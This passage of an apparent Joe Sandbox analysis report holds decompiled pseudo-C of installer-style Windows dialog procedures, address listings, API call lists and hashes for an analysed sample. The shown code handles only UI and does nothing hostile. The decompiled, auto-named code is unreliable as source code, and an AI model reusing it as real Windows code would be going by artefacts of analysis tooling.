									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42d24c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x42d260;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42d24c = 0;
								 *0x42d260 = 0;
								 *0x434f60 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404ED4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x42d260;
									_t201 =  *0x434f28;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x434f2c <= 0) {
										L86:
										if( *0x434fbe == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x434f2c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x42d260);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x434f60 = _t291;
					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
					 *0x42d254 =  *0x42d254 | 0xffffffff;
					_t297 = _t258;
					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42d24c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404499(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404499(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x434f2c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x42d260 + _t300 * 4) = _t284;
									_v16 =  *( *0x42d260 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x434f2c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004044CE(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044CE(_v12);
								L93:
								return E00404500(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                                      0x00404f0d
                                                                                      0x00404f26
                                                                                      0x00404f2b
                                                                                      0x00404f33
                                                                                      0x00404f39
                                                                                      0x00404f4f
                                                                                      0x00404f52
                                                                                      0x0040517d
                                                                                      0x00405184
                                                                                      0x00405198
                                                                                      0x00405186
                                                                                      0x00405188
                                                                                      0x0040518b
                                                                                      0x0040518c
                                                                                      0x00405193
                                                                                      0x00405193
                                                                                      0x004051a4
                                                                                      0x004051b2
                                                                                      0x004051b5
                                                                                      0x004051cb
                                                                                      0x00405240
                                                                                      0x00405243
                                                                                      0x00405245
                                                                                      0x0040524f
                                                                                      0x0040525d
                                                                                      0x0040525d
                                                                                      0x0040525f
                                                                                      0x00405269
                                                                                      0x0040526f
                                                                                      0x00405272
                                                                                      0x00405275
                                                                                      0x00405290
                                                                                      0x00405277
                                                                                      0x00405281
                                                                                      0x00405281
                                                                                      0x00405275
                                                                                      0x00405269
                                                                                      0x00000000
                                                                                      0x00405243
                                                                                      0x004051d0
                                                                                      0x004051db
                                                                                      0x004051e0
                                                                                      0x004051e7
                                                                                      0x004051ec
                                                                                      0x004051f0
                                                                                      0x004051fb
                                                                                      0x004051fb
                                                                                      0x004051ff
                                                                                      0x00405203
                                                                                      0x00405207
                                                                                      0x0040521a
                                                                                      0x00405209
                                                                                      0x00405209
                                                                                      0x00405210
                                                                                      0x00405216
                                                                                      0x00405212
                                                                                      0x00405212
                                                                                      0x00405212
                                                                                      0x00405210
                                                                                      0x0040521e
                                                                                      0x00405220
                                                                                      0x00405233
                                                                                      0x00405236
                                                                                      0x00405239
                                                                                      0x00405239
                                                                                      0x00405203
                                                                                      0x00000000
                                                                                      0x004051f0
                                                                                      0x004051d2
                                                                                      0x004051d9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405293
                                                                                      0x00405293
                                                                                      0x0040529a
                                                                                      0x0040530b
                                                                                      0x00405313
                                                                                      0x0040531b
                                                                                      0x0040531b
                                                                                      0x00405324
                                                                                      0x00405326
                                                                                      0x0040532d
                                                                                      0x00405330
                                                                                      0x00405330
                                                                                      0x00405336
                                                                                      0x0040533d
                                                                                      0x00405340
                                                                                      0x00405340
                                                                                      0x00405346
                                                                                      0x0040534c
                                                                                      0x00405352
                                                                                      0x00405352
                                                                                      0x0040535f
                                                                                      0x004054c0
                                                                                      0x004054c7
                                                                                      0x004054e4
                                                                                      0x004054ea
                                                                                      0x004054fc
                                                                                      0x004054fc
                                                                                      0x00000000
                                                                                      0x00405365
                                                                                      0x00405367
                                                                                      0x0040536c
                                                                                      0x00405371
                                                                                      0x00405376
                                                                                      0x00405378
                                                                                      0x00405378
                                                                                      0x00405379
                                                                                      0x0040537a
                                                                                      0x0040537c
                                                                                      0x0040537c
                                                                                      0x00405384
                                                                                      0x004053c5
                                                                                      0x004053c7
                                                                                      0x004053d7
                                                                                      0x004053da
                                                                                      0x004053df
                                                                                      0x004053e6
                                                                                      0x004053e9
                                                                                      0x0040548b
                                                                                      0x00405494
                                                                                      0x0040549c
                                                                                      0x0040549c
                                                                                      0x004054aa
                                                                                      0x004054bb
                                                                                      0x004054bb
                                                                                      0x00000000
                                                                                      0x004054aa
                                                                                      0x004053ef
                                                                                      0x004053f2
                                                                                      0x004053f8
                                                                                      0x004053fd
                                                                                      0x004053ff
                                                                                      0x00405401
                                                                                      0x00405407
                                                                                      0x0040540e
                                                                                      0x00405413
                                                                                      0x0040541a
                                                                                      0x0040541d
                                                                                      0x0040541d
                                                                                      0x00405424
                                                                                      0x00405430
                                                                                      0x00405434
                                                                                      0x00405436
                                                                                      0x00405436
                                                                                      0x00405426
                                                                                      0x00405428
                                                                                      0x00405428
                                                                                      0x00405456
                                                                                      0x00405462
                                                                                      0x00405471
                                                                                      0x00405471
                                                                                      0x00405473
                                                                                      0x00405476
                                                                                      0x0040547f
                                                                                      0x00000000
                                                                                      0x00405386
                                                                                      0x00405391
                                                                                      0x00405394
                                                                                      0x00405399
                                                                                      0x0040539b
                                                                                      0x0040539f
                                                                                      0x004053af
                                                                                      0x004053b9
                                                                                      0x004053bb
                                                                                      0x004053be
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004053a1
                                                                                      0x004053a1
                                                                                      0x004053a7
                                                                                      0x004053a9
                                                                                      0x004053a9
                                                                                      0x004053aa
                                                                                      0x004053ab
                                                                                      0x00000000
                                                                                      0x004053a1
                                                                                      0x00405384
                                                                                      0x0040535f
                                                                                      0x004052a2
                                                                                      0x00000000
                                                                                      0x004052b8
                                                                                      0x004052c2
                                                                                      0x004052c7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004052d9
                                                                                      0x004052de
                                                                                      0x004052ea
                                                                                      0x004052ea
                                                                                      0x004052ec
                                                                                      0x004052fb
                                                                                      0x004052fd
                                                                                      0x00405301
                                                                                      0x00405304
                                                                                      0x00000000
                                                                                      0x00405304
                                                                                      0x004052a2
                                                                                      0x00404f58
                                                                                      0x00404f5d
                                                                                      0x00404f66
                                                                                      0x00404f6d
                                                                                      0x00404f7f
                                                                                      0x00404f8a
                                                                                      0x00404f90
                                                                                      0x00404f9e
                                                                                      0x00404fb2
                                                                                      0x00404fb7
                                                                                      0x00404fc4
                                                                                      0x00404fc9
                                                                                      0x00404fdf
                                                                                      0x00404ff0
                                                                                      0x00404ffd
                                                                                      0x00404ffd
                                                                                      0x00405000
                                                                                      0x00405006
                                                                                      0x00405008
                                                                                      0x0040500b
                                                                                      0x00405010
                                                                                      0x00405015
                                                                                      0x00405017
                                                                                      0x00405017
                                                                                      0x00405037
                                                                                      0x00405037
                                                                                      0x00405039
                                                                                      0x0040503a
                                                                                      0x0040503f
                                                                                      0x00405045
                                                                                      0x00405049
                                                                                      0x0040504e
                                                                                      0x00405056
                                                                                      0x0040505a
                                                                                      0x0040505f
                                                                                      0x00405064
                                                                                      0x0040506c
                                                                                      0x0040506f
                                                                                      0x0040513f
                                                                                      0x00405152
                                                                                      0x00000000
                                                                                      0x00405075
                                                                                      0x00405078
                                                                                      0x0040507b
                                                                                      0x0040507e
                                                                                      0x0040507e
                                                                                      0x00405084
                                                                                      0x0040508d
                                                                                      0x00405090
                                                                                      0x00405094
                                                                                      0x00405097
                                                                                      0x0040509a
                                                                                      0x004050a3
                                                                                      0x004050ac
                                                                                      0x004050af
                                                                                      0x004050b2
                                                                                      0x004050b5
                                                                                      0x004050f3
                                                                                      0x0040511e
                                                                                      0x004050f5
                                                                                      0x00405104
                                                                                      0x00405104
                                                                                      0x004050b7
                                                                                      0x004050ba
                                                                                      0x004050c8
                                                                                      0x004050d2
                                                                                      0x004050da
                                                                                      0x004050e1
                                                                                      0x004050ec
                                                                                      0x004050ec
                                                                                      0x004050b5
                                                                                      0x00405124
                                                                                      0x00405125
                                                                                      0x00405131
                                                                                      0x00405131
                                                                                      0x0040513d
                                                                                      0x00405158
                                                                                      0x0040515b
                                                                                      0x00405178
                                                                                      0x00000000
                                                                                      0x0040515d
                                                                                      0x00405162
                                                                                      0x0040516b
                                                                                      0x004054fe
                                                                                      0x00405510
                                                                                      0x00405510
                                                                                      0x0040515b
                                                                                      0x00000000
                                                                                      0x0040513d
                                                                                      0x0040506f

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                                      • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
                                                                                      • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                                      • DeleteObject.GDI32(00000000), ref: 00405000
                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                                        • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                                                      • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                                      • GlobalFree.KERNEL32(?), ref: 00405340
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                                      • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                                      • ShowWindow.USER32(00000000), ref: 004054FC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                      • String ID: $M$N
                                                                                      • API String ID: 2564846305-813528018
                                                                                      • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                      • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                                                      • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                                                      • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404658 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 91%
                                                                                      			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42b234 =  *0x42b234 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404500(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x432ea0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404907(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x434f08, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x434f08, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
						goto L27;
					} else {
						_t69 =  *0x42c240; // 0x7d1fcc
						_t29 = _t69 + 0x14; // 0x7d1fe0
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048E3();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x433edc - 4 + _t75 * 4);
				}
				_t76 =  *0x434f38 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = 0x404609;
				if(_t110 != 2) {
					_v8 = E004045CF;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404499(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404499(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004044CE(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x434f10 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x42b234 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x42b234 = 0;
				return 0;
			}



















                                                                                      0x0040466a
                                                                                      0x00404797
                                                                                      0x004047f4
                                                                                      0x004047f8
                                                                                      0x004048c5
                                                                                      0x004048c7
                                                                                      0x004048c7
                                                                                      0x004048cd
                                                                                      0x004048cd
                                                                                      0x004048d0
                                                                                      0x00000000
                                                                                      0x004048d7
                                                                                      0x00404806
                                                                                      0x0040480c
                                                                                      0x00404816
                                                                                      0x00404821
                                                                                      0x00404824
                                                                                      0x00404827
                                                                                      0x00404832
                                                                                      0x00404835
                                                                                      0x0040483c
                                                                                      0x00404849
                                                                                      0x0040485a
                                                                                      0x00404860
                                                                                      0x00404868
                                                                                      0x00404876
                                                                                      0x0040487c
                                                                                      0x0040487c
                                                                                      0x0040483c
                                                                                      0x00404886
                                                                                      0x00000000
                                                                                      0x00404891
                                                                                      0x00404895
                                                                                      0x004048a5
                                                                                      0x004048a5
                                                                                      0x004048ab
                                                                                      0x004048b7
                                                                                      0x004048b7
                                                                                      0x00000000
                                                                                      0x004048bb
                                                                                      0x00404886
                                                                                      0x004047a2
                                                                                      0x00000000
                                                                                      0x004047b4
                                                                                      0x004047b4
                                                                                      0x004047b9
                                                                                      0x004047b9
                                                                                      0x004047bf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004047e8
                                                                                      0x004047ea
                                                                                      0x004047ef
                                                                                      0x00000000
                                                                                      0x004047ef
                                                                                      0x004047a2
                                                                                      0x00404670
                                                                                      0x00404673
                                                                                      0x00404678
                                                                                      0x00404689
                                                                                      0x00404689
                                                                                      0x00404691
                                                                                      0x00404694
                                                                                      0x00404698
                                                                                      0x0040469b
                                                                                      0x0040469f
                                                                                      0x004046a2
                                                                                      0x004046a5
                                                                                      0x004046a8
                                                                                      0x004046af
                                                                                      0x004046b1
                                                                                      0x004046b1
                                                                                      0x004046bb
                                                                                      0x004046c8
                                                                                      0x004046d2
                                                                                      0x004046d7
                                                                                      0x004046da
                                                                                      0x004046df
                                                                                      0x004046f6
                                                                                      0x004046fd
                                                                                      0x00404710
                                                                                      0x00404713
                                                                                      0x00404727
                                                                                      0x0040472e
                                                                                      0x00404733
                                                                                      0x00404738
                                                                                      0x00404738
                                                                                      0x00404746
                                                                                      0x00404754
                                                                                      0x00404766
                                                                                      0x0040476b
                                                                                      0x0040477b
                                                                                      0x0040477d
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040470A
                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                                                      • GetSysColor.USER32(?), ref: 00404738
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                                                      • lstrlenW.KERNEL32(?), ref: 00404759
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004047D4
                                                                                      • SendMessageW.USER32(00000000), ref: 004047DB
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404806
                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                                                      • SetCursor.USER32(00000000), ref: 0040485A
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                                                      • SetCursor.USER32(00000000), ref: 00404876
                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                      • String ID: Call$N
                                                                                      • API String ID: 3103080414-3438112850
                                                                                      • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                      • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                                                      • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                                                      • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 90%
                                                                                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
